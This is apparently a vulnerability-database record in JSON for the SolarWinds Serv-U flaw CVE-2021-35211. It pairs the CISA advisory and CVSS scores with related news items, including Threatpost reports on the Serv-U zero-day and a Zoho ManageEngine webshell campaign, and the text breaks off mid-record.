SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability—CVE-2021-35211—affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products.
Microsoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.
CISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.
{"id": "CISA:2E658D779271DB98A2BD53EE81F29F3B", "type": "cisa", "bulletinFamily": "info", "title": "SolarWinds Releases Advisory for Serv-U Vulnerability", "description": "SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability\u2014CVE-2021-35211\u2014affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. \n \nMicrosoft [has reported](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) limited and targeted attacks using a 0-day exploit against this vulnerability.\n\nCISA encourages users and administrators to review the SolarWinds [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) and install the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability>); we'd welcome your feedback.\n", "published": "2021-07-13T00:00:00", "modified": "2021-07-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, 
"obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/solarwinds-releases-advisory-serv-u-vulnerability", "reporter": "CISA", "references": ["https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211", "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211"], "cvelist": ["CVE-2021-35211"], "immutableFields": [], "lastseen": "2021-08-02T18:08:35", "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0917"]}, {"type": "cve", "idList": ["CVE-2021-35211"]}, {"type": "githubexploit", "idList": ["15CF4822-F1E8-5BDB-8E65-8FC88F816E1E"]}, {"type": "hivepro", "idList": ["HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E"]}, {"type": "mmpc", "idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "MMPC:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "mssecure", "idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "MSSECURE:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "nessus", "idList": ["SERVU_15_2_3_2.NASL"]}, {"type": "qualysblog", "idList": 
["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362"]}, {"type": "thn", "idList": ["THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "THN:D84F06239D4B68B06712C485E00D6D1F"]}, {"type": "threatpost", "idList": ["THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:BC99709891AA93FC7767B53445FC2736"]}], "rev": 4}, "score": {"value": 2.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917"]}, {"type": "avleonov", "idList": ["AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0917"]}, {"type": "cve", "idList": ["CVE-2021-35211"]}, {"type": "githubexploit", "idList": ["15CF4822-F1E8-5BDB-8E65-8FC88F816E1E"]}, {"type": "hivepro", "idList": ["HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13"]}, {"type": "ics", "idList": ["ICSA-20-282-02"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E"]}, {"type": "mmpc", "idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "mssecure", "idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "nessus", "idList": ["SERVU_15_2_3_2.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362"]}, {"type": "thn", "idList": ["THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:8636741FCF3A03B6238D8BAF1D9D00EB"]}, {"type": "threatpost", "idList": ["THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:F7C1C6A7D07F7CFA8DFDD80051147A3B"]}]}, "exploitation": null, "vulnersScore": 2.5}, "wildExploited": true, "_state": {"wildexploited": 1647356733, "dependencies": 1647589307, "score": 
1659753002}, "_internal": {"wildexploited_cvelist": ["CVE-2021-35211"]}}
{"malwarebytes": [{"lastseen": "2021-11-15T10:37:13", "description": "### Last week on Malwarebytes Labs\n\n * Multiple video games break after [domain name snafu](<https://blog.malwarebytes.com/privacy-2/2021/11/multiple-video-games-break-after-domain-name-snafu/>)\n * How to remove [adware on an Android phone](<https://blog.malwarebytes.com/101/how-tos/2021/11/how-to-remove-adware-on-an-android-phone/>)\n * [Smart TV adverts](<https://blog.malwarebytes.com/privacy-2/2021/11/smart-tv-adverts-put-a-wrinkle-in-your-programming/>) put a wrinkle in your programming\n * Are cybercriminals turning away from the US and [targeting Europe](<https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/>) instead?\n * Patch now! [Microsoft plugs actively exploited zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>) and other updates\n * [Playstation 5 hacked](<https://blog.malwarebytes.com/hacking-2/2021/11/playstation-5-hacked-twice/>)\u2014twice!\n * Murder-for-hire, money laundering, and more: How [organised criminals work online](<https://blog.malwarebytes.com/reports/2021/11/murder-for-hire-money-laundering-and-more-how-organised-criminals-work-online/>)\n * Could Apple\u2019s new MacBooks signal a [change in direction on security](<https://blog.malwarebytes.com/mac/2021/11/do-apples-new-macbooks-signal-a-change-in-direction-on-security/>)?\n * The [importance of backing up](<https://blog.malwarebytes.com/101/2021/11/the-importance-of-backing-up/>)\n * A [multi-stage PowerShell](<https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/>) based attack targets Kazakhstan\n\nOn Malwarebytes' Lock and Code podcast episode S02E21 of this week we talked to Jess Dodson about "[Why we fail at getting the cybersecurity basics 
right.](<https://blog.malwarebytes.com/podcast/2021/11/why-we-fail-at-getting-the-cybersecurity-basics-right-with-jess-dodson-lock-and-code-s02e21/>)"\n\n### Other cybersecurity news\n\n * Romanian authorities arrested two individuals suspected of cyberattacks deploying the [Sodinokibi/REvil ransomware](<https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged>). (Source: Europol Newsroom)\n * The TOR project launched a new release:[ Tor Browser 11.0](<https://blog.torproject.org/new-release-tor-browser-11-0>) (Source: The TOR blog)\n * Threat actors are actively exploiting [ZOHO ManageEngine ADSelfService Plus vulnerability](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) in a targeted campaign. (Source: Microsoft Security blog) \n * [SolarWinds Serv-U vulnerability](<https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/>) is used for initial access in Clop ransomware attacks. (Source: Fox IT)\n * Facebook whistleblower Frances Haugen warned that the [metaverse will gather even more personal information](<https://apnews.com/article/technology-lifestyle-business-only-on-ap-media-e4f03d38243552e46a77d0d3f0d45e3b>). (Source: AP news)\n * The US Treasury Department announced a set of actions focused on [disrupting criminal ransomware actors and virtual currency exchanges](<https://home.treasury.gov/news/press-releases/jy0471>) that launder the proceeds of ransomware. (Source: US Department of the Treasury)\n * A suspected state-sponsored threat actor has used Hong Kong pro-democracy news sites to deploy a [macOS zero-day exploit chain](<https://therecord.media/macos-zero-day-deployed-via-hong-kong-pro-democracy-news-sites/>). 
(Source: The Record)\n * [Void Balaur hackers-for-hire](<https://www.bleepingcomputer.com/news/security/void-balaur-hackers-for-hire-sell-stolen-mailboxes-and-private-data/>) sell stolen mailboxes and private data. (Source: Bleeping Computer)\n * [Queensland water supplier Sunwater](<https://www.abc.net.au/news/2021-11-11/qld-hackers-target-water-supplier-sunwater-cyber-security-attack/100610400>) targeted by hackers in months-long undetected cybersecurity breach. (Source: ABC.net.au news)\n * Missouri apologizes to 600,000 teachers who had [SSNs and private info exposed](<https://www.zdnet.com/article/missouri-apologizes-to-600k-teachers-who-had-ssns-and-private-info-exposed-offers-credit-monitoring/>). (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (Nov 8 - Nov 14)](<https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-15T10:14:02", "type": "malwarebytes", "title": "A week in security (Nov 8 \u2013 Nov 14)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-15T10:14:02", "id": "MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:37", "description": "A remote code execution vulnerability exists in SolarWinds Serv-U. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-05T00:00:00", "type": "checkpoint_advisories", "title": "SolarWinds Serv-U Remote Code Execution (CVE-2021-35211)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-12-05T00:00:00", "id": "CPAI-2021-0917", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-13T13:05:06", "description": "SolarWinds has issued a hotfix for a zero-day remote 
code execution (RCE) vulnerability already under active, yet limited, attack on some of the company\u2019s customers.\n\nMicrosoft alerted the company about the flaw, which affects its [Serv-U Managed File Transfer Server](<https://www.solarwinds.com/serv-u-managed-file-transfer-server>) and [Serv-U Secured FTP](<https://www.solarwinds.com/ftp-server-software>) products. Specifically, the vulnerability exists in the latest Serv-U version 15.2.3 HF1 released on May 5 of this year, as well as all prior versions, the company said in a [security advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) posted over the weekend.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft provided a proof-of-concept (PoC) exploit to SolarWinds, demonstrating how a threat actor who successfully exploits the vulnerability could run arbitrary code with privileges, according to the advisory.\n\n\u201cAn attacker could then install programs; view, change or delete data; or run programs on the affected system,\u201d the computing giant said.\n\nThough the current threat appears to be from a sole actor and \u201cinvolves a limited, targeted set of customers,\u201d SolarWinds wanted to remedy the situation before it could escalate, the company said. \u201cOur joint teams have mobilized to address it quickly,\u201d according to the advisory.\n\nSolarWinds does not currently know how many customers may be directly affected by the flaw, nor has it identified the ones who were targeted. 
The company is recommending that all customers using the affected products update now, which can be done by accessing the company\u2019s [customer portal](<https://customerportal.solarwinds.com/>).\n\n## Unrelated to Supply-Chain Attack\n\nIndeed, SolarWinds likely still has fresh memories of a [global supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) targeting the company\u2019s technology that was discovered late last year and stretched well into 2021. That attack occurred when [a state-sponsored APT](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) injected malicious code into normal software updates for SolarWinds Orion network-management platform.\n\nSpecifically, attackers installed the Sunburst/Solorigate backdoor inside SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of Orion. From there, the threat actors mounted a [massive cyberespionage campaign](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that hit nine U.S. government agencies, Microsoft and other tech companies, as well as about 100 other victims.\n\nSolarWinds stressed in its advisory that the latest vulnerability is not related to that [previous scenario](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) \u2014 which [cost the company $3.5 million](<https://d18rn0p25nwr6d.cloudfront.net/CIK-0001739942/48bd02f7-3c52-4abc-a5e9-60401f9a4e8b.pdf>) in investigation and remediation expenses \u2014 in any way.\n\n\u201cAll other SolarWinds and N-able (formerly SolarWinds MSP) are not affected** **by this vulnerability,\u201d the company wrote. 
\u201cThis includes the Orion Platform, and all Orion Platform modules.\u201d\n\nIn fact, the company even included a complete list of products \u201cnot known to be affected by this security vulnerability\u201d in the advisory for good measure, perhaps to stave off any potential panic or doubt that news of the latest vulnerability might inspire.\n\nIndeed, one security expert took to Twitter to advise organizations to keep a cool head over the news and take preemptive measures rather than raise an immediate alarm.\n\n\u201cI know there\u2019s a tendency to panic because it\u2019s SolarWinds \u2026 but I\u2019d suggest avoiding panic and taking proactive actions for defense and response instead,\u201d [tweeted](<https://twitter.com/likethecoins/status/1414681417053835265>) Katie Nickels, director of intel at security operations firm Red Canary.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-13T12:58:11", "type": "threatpost", "title": "SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:58:11", "id": "THREATPOST:529C328386588625C56031DEF4AB5D63", "href": "https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. 
The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. 
It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on 
the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d Unit 42 researchers Robert Falcone, Jeff White and Peter Renals explained. 
\u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390, aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. 
\u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 
16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. 
Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threatpost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and ManageEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. 
If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
